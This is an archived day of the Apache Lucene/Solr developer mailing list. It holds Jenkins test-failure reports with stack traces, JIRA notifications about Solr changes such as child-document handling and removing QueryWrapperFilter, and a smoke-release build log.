[JENKINS] Lucene-Solr-BadApples-Tests-master - Build # 61 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-BadApples-Tests-master/61/

4 tests failed.
FAILED:  
org.apache.solr.cloud.autoscaling.sim.TestGenericDistributedQueue.testDistributedQueue

Error Message:
Test abandoned because suite timeout was reached.

Stack Trace:
java.lang.Exception: Test abandoned because suite timeout was reached.
at __randomizedtesting.SeedInfo.seed([71E476A51D330AAC]:0)


FAILED:  
junit.framework.TestSuite.org.apache.solr.cloud.autoscaling.sim.TestGenericDistributedQueue

Error Message:
Suite timeout exceeded (>= 720 msec).

Stack Trace:
java.lang.Exception: Suite timeout exceeded (>= 720 msec).
at __randomizedtesting.SeedInfo.seed([71E476A51D330AAC]:0)


FAILED:  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger

Error Message:
waitFor not elapsed but produced an event

Stack Trace:
java.lang.AssertionError: waitFor not elapsed but produced an event
at 
__randomizedtesting.SeedInfo.seed([71E476A51D330AAC:122F402784FC7981]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at org.junit.Assert.assertNull(Assert.java:551)
at 
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger(IndexSizeTriggerTest.java:180)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
a

[JENKINS-EA] Lucene-Solr-master-Windows (64bit/jdk-11-ea+14) - Build # 7331 - Still Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-master-Windows/7331/
Java: 64bit/jdk-11-ea+14 -XX:+UseCompressedOops -XX:+UseConcMarkSweepGC

7 tests failed.
FAILED:  org.apache.solr.handler.TestReplicationHandler.doTestStressReplication

Error Message:
found:2[index.20180522024118516, index.20180522024120968, index.properties, 
replication.properties, snapshot_metadata]

Stack Trace:
java.lang.AssertionError: found:2[index.20180522024118516, 
index.20180522024120968, index.properties, replication.properties, 
snapshot_metadata]
at 
__randomizedtesting.SeedInfo.seed([91F96B5AE57E8824:4A526B9CE056E197]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at 
org.apache.solr.handler.TestReplicationHandler.checkForSingleIndex(TestReplicationHandler.java:968)
at 
org.apache.solr.handler.TestReplicationHandler.checkForSingleIndex(TestReplicationHandler.java:939)
at 
org.apache.solr.handler.TestReplicationHandler.doTestStressReplication(TestReplicationHandler.java:915)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:566)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLea

[jira] [Commented] (SOLR-12361) Change _childDocuments to Map

2018-05-21 Thread mosh (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12361?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483513#comment-16483513
 ] 

mosh commented on SOLR-12361:
-

[~dsmiley]
Perhaps changing the _childDocuments to Map (maybe a 
name change should be made) could solve our problem gracefully?

> Change _childDocuments to Map
> -
>
> Key: SOLR-12361
> URL: https://issues.apache.org/jira/browse/SOLR-12361
> Project: Solr
>  Issue Type: Sub-task
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: mosh
>Priority: Major
> Attachments: SOLR-12361.patch, SOLR-12361.patch
>
>  Time Spent: 20m
>  Remaining Estimate: 0h
>
> During the discussion on SOLR-12298, there was a proposal to change 
> _childDocuments in SolrDocumentBase to a Map, to incorporate the relationship 
> between the parent and its child documents.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12366) Avoid SlowAtomicReader.getLiveDocs -- it's slow

2018-05-21 Thread David Smiley (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12366?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483501#comment-16483501
 ] 

David Smiley commented on SOLR-12366:
-

Updated the patch:
* replaced the implementation of SolrIndexSearcher.getFirstMatch to be in terms 
of lookupId -- less to maintain and one fewer reference to the 
SlowCompositeReader (field "filterReader").  Slightly faster probably.
* simplified getLiveDocsBits further
* renamed getLiveDocs to getLiveDocSet (thus changed a bunch of other files) 
but kept the original and marked deprecated, to be removed in 8.0

> Avoid SlowAtomicReader.getLiveDocs -- it's slow
> ---
>
> Key: SOLR-12366
> URL: https://issues.apache.org/jira/browse/SOLR-12366
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: search
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Attachments: SOLR-12366.patch, SOLR-12366.patch, SOLR-12366.patch, 
> SOLR-12366.patch
>
>
> SlowAtomicReader is of course slow, and it's getLiveDocs (based on MultiBits) 
> is slow as it uses a binary search for each lookup.  There are various places 
> in Solr that use SolrIndexSearcher.getSlowAtomicReader and then get the 
> liveDocs.  Most of these places ought to work with SolrIndexSearcher's 
> getLiveDocs method.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-BadApples-7.x-Linux (32bit/jdk1.8.0_172) - Build # 40 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-BadApples-7.x-Linux/40/
Java: 32bit/jdk1.8.0_172 -client -XX:+UseSerialGC

3 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState

Error Message:
Did not expect the processor to fire on first run! event={   
"id":"85f77e799a7cT5ie8lom3mjd3ww5uoe2g0wczf",   "source":"node_added_trigger", 
  "eventTime":147298025314940,   "eventType":"NODEADDED",   "properties":{ 
"eventTimes":[147298025314940], "nodeNames":["127.0.0.1:37613_solr"]}}

Stack Trace:
java.lang.AssertionError: Did not expect the processor to fire on first run! 
event={
  "id":"85f77e799a7cT5ie8lom3mjd3ww5uoe2g0wczf",
  "source":"node_added_trigger",
  "eventTime":147298025314940,
  "eventType":"NODEADDED",
  "properties":{
"eventTimes":[147298025314940],
"nodeNames":["127.0.0.1:37613_solr"]}}
at 
__randomizedtesting.SeedInfo.seed([2CCD1E2AB6A7F4A1:E263BAB94E9E8CB7]:0)
at org.junit.Assert.fail(Assert.java:93)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.lambda$new$0(NodeAddedTriggerTest.java:49)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTrigger.run(NodeAddedTrigger.java:161)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState(NodeAddedTriggerTest.java:257)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIg

[jira] [Updated] (SOLR-12383) Add solr child documents as values inside SolrInputField

2018-05-21 Thread mosh (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12383?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

mosh updated SOLR-12383:

Description: 
During the discussion on SOLR-12298, there was a proposal to remove 
_childDocuments, and incorporate the relationship between the parent and its 
child documents, by holding the child documents inside a solrInputField, inside 
of the document.
{quote}What if a SolrInputDocument was simply a supported value inside 
SolrInputField?
{quote}

  was:
During the discussion on SOLR-12298, there was a proposal to remove 
_childDocuments, and incorporate the relationship between the parent and its 
child documents, by holding the child documents inside a solrInputField, inside 
of the document.




> Add solr child documents as values inside SolrInputField
> 
>
> Key: SOLR-12383
> URL: https://issues.apache.org/jira/browse/SOLR-12383
> Project: Solr
>  Issue Type: Sub-task
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: mosh
>Priority: Major
>
> During the discussion on SOLR-12298, there was a proposal to remove 
> _childDocuments, and incorporate the relationship between the parent and its 
> child documents, by holding the child documents inside a solrInputField, 
> inside of the document.
> {quote}What if a SolrInputDocument was simply a supported value inside 
> SolrInputField?
> {quote}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Created] (SOLR-12383) Add solr child documents as values inside SolrInputField

2018-05-21 Thread mosh (JIRA)
mosh created SOLR-12383:
---

 Summary: Add solr child documents as values inside SolrInputField
 Key: SOLR-12383
 URL: https://issues.apache.org/jira/browse/SOLR-12383
 Project: Solr
  Issue Type: Sub-task
  Security Level: Public (Default Security Level. Issues are Public)
Reporter: mosh


During the discussion on SOLR-12298, there was a proposal to remove 
_childDocuments, and incorporate the relationship between the parent and its 
child documents, by holding the child documents inside a solrInputField, inside 
of the document.





--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12366) Avoid SlowAtomicReader.getLiveDocs -- it's slow

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12366?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12366:

Attachment: SOLR-12366.patch

> Avoid SlowAtomicReader.getLiveDocs -- it's slow
> ---
>
> Key: SOLR-12366
> URL: https://issues.apache.org/jira/browse/SOLR-12366
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: search
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Attachments: SOLR-12366.patch, SOLR-12366.patch, SOLR-12366.patch, 
> SOLR-12366.patch
>
>
> SlowAtomicReader is of course slow, and it's getLiveDocs (based on MultiBits) 
> is slow as it uses a binary search for each lookup.  There are various places 
> in Solr that use SolrIndexSearcher.getSlowAtomicReader and then get the 
> liveDocs.  Most of these places ought to work with SolrIndexSearcher's 
> getLiveDocs method.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12337) Remove QueryWrapperFilter

2018-05-21 Thread David Smiley (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12337?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483445#comment-16483445
 ] 

David Smiley commented on SOLR-12337:
-

In this updated patch, I further removed QueryWrapperFilter and its test.  The 
only remaining use of the class was in AbstractAnalyticsFieldTest (analytics 
contrib, tests) which was a very unnecessary use of Filters to simply know 
which docs were live (not deleted).
I don't see a need to leave QWF in 7x; Filters _are_ Queries.
I plan to commit tomorrow.

> Remove QueryWrapperFilter
> -
>
> Key: SOLR-12337
> URL: https://issues.apache.org/jira/browse/SOLR-12337
> Project: Solr
>  Issue Type: Sub-task
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Fix For: 7.4
>
> Attachments: SOLR-12337.patch, SOLR-12337.patch
>
>
> QueryWrapperFilter has not been needed ever since Filter was changed to 
> extend Query -- LUCENE-1518.  It was retained because there was at least one 
> place in Lucene that had a Filter/Query distinction, but it was forgotten 
> when Filter moved to Solr.  It contains some code that creates a temporary 
> IndexSearcher but forgets to null out the cache on it, and so 
> QueryWrapperFilter can add non-trivial overhead.  We should simply remove it 
> altogether.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Assigned] (SOLR-12247) NodeAddedTriggerTest.testRestoreState() failure: Did not expect the processor to fire on first run!

2018-05-21 Thread Cao Manh Dat (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12247?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Cao Manh Dat reassigned SOLR-12247:
---

Assignee: Cao Manh Dat

> NodeAddedTriggerTest.testRestoreState() failure: Did not expect the processor 
> to fire on first run!
> ---
>
> Key: SOLR-12247
> URL: https://issues.apache.org/jira/browse/SOLR-12247
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: AutoScaling, Tests
>Reporter: Steve Rowe
>Assignee: Cao Manh Dat
>Priority: Major
>
> 100% reproducing seed from 
> [https://builds.apache.org/job/Lucene-Solr-SmokeRelease-7.x/203/]:
> {noformat}
> Checking out Revision 1b5690203de6d529f1eda671f84d710abd561bea 
> (refs/remotes/origin/branch_7x)
> [...]
>[smoker][junit4]   2> NOTE: reproduce with: ant test  
> -Dtestcase=NodeAddedTriggerTest -Dtests.method=testRestoreState 
> -Dtests.seed=B9D447011147FCB6 -Dtests.multiplier=2 -Dtests.locale=fr-BE 
> -Dtests.timezone=MIT -Dtests.asserts=true -Dtests.file.encoding=UTF-8
>[smoker][junit4] FAILURE 3.38s J2 | 
> NodeAddedTriggerTest.testRestoreState <<<
>[smoker][junit4]> Throwable #1: java.lang.AssertionError: Did not 
> expect the processor to fire on first run! event={
>[smoker][junit4]>   
> "id":"16bf1f58bda2d8Ta3xzeiz95jejbcrchofogpdj2",
>[smoker][junit4]>   "source":"node_added_trigger",
>[smoker][junit4]>   "eventTime":6402590841348824,
>[smoker][junit4]>   "eventType":"NODEADDED",
>[smoker][junit4]>   "properties":{
>[smoker][junit4]> "eventTimes":[6402590841348824],
>[smoker][junit4]> "nodeNames":["127.0.0.1:40637_solr"]}}
>[smoker][junit4]>  at 
> __randomizedtesting.SeedInfo.seed([B9D447011147FCB6:777AE392E97E84A0]:0)
>[smoker][junit4]>  at 
> org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.lambda$new$0(NodeAddedTriggerTest.java:49)
>[smoker][junit4]>  at 
> org.apache.solr.cloud.autoscaling.NodeAddedTrigger.run(NodeAddedTrigger.java:161)
>[smoker][junit4]>  at 
> org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState(NodeAddedTriggerTest.java:257)
>[smoker][junit4]>  at java.lang.Thread.run(Thread.java:748)
> [...]
>[smoker][junit4]   2> NOTE: test params are: 
> codec=Asserting(Lucene70), sim=RandomSimilarity(queryNorm=true): {}, 
> locale=fr-BE, timezone=MIT
>[smoker][junit4]   2> NOTE: Linux 4.4.0-112-generic amd64/Oracle 
> Corporation 1.8.0_152 (64-bit)/cpus=4,threads=1,free=70702960,total=428867584
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



Re: [JENKINS] Lucene-Solr-SmokeRelease-master - Build # 1029 - Still Failing

2018-05-21 Thread Chris Hostetter

   [smoker]   confirm all releases have coverage in TestBackwardsCompatibility
   [smoker] find all past Lucene releases...
   [smoker] run TestBackwardsCompatibility..
   [smoker] Releases that don't seem to be tested:
   [smoker]   6.6.4





On Tue, 22 May 2018, Apache Jenkins Server wrote:

: Date: Tue, 22 May 2018 02:29:28 + (UTC)
: From: Apache Jenkins Server 
: Reply-To: dev@lucene.apache.org
: To: dev@lucene.apache.org
: Subject: [JENKINS] Lucene-Solr-SmokeRelease-master - Build # 1029 - Still
: Failing
: 
: Build: https://builds.apache.org/job/Lucene-Solr-SmokeRelease-master/1029/
: 
: No tests ran.
: 
: Build Log:
: [...truncated 24174 lines...]
: [asciidoctor:convert] asciidoctor: ERROR: about-this-guide.adoc: line 1: 
invalid part, must have at least one section (e.g., chapter, appendix, etc.)
: [asciidoctor:convert] asciidoctor: ERROR: solr-glossary.adoc: line 1: invalid 
part, must have at least one section (e.g., chapter, appendix, etc.)
:  [java] Processed 2212 links (1766 relative) to 3083 anchors in 245 files
:  [echo] Validated Links & Anchors via: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr-ref-guide/bare-bones-html/
: 
: -dist-changes:
:  [copy] Copying 4 files to 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/changes
: 
: -dist-keys:
:   [get] Getting: http://home.apache.org/keys/group/lucene.asc
:   [get] To: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/KEYS
: 
: package:
: 
: -unpack-solr-tgz:
: 
: -ensure-solr-tgz-exists:
: [mkdir] Created dir: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr.tgz.unpacked
: [untar] Expanding: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/package/solr-8.0.0.tgz
 into 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/solr/build/solr.tgz.unpacked
: 
: generate-maven-artifacts:
: 
: resolve:
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
: [loadresource] Do not set property disallowed.ivy.jars.list as its length is 
0.
: 
: -ivy-fail-disallowed-ivy-version:
: 
: ivy-fail:
: 
: ivy-configure:
: [ivy:configure] :: loading settings :: file = 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-master/lucene/top-level-ivy-settings.xml
: 
: resolve:
: 
: ivy-availability-check:
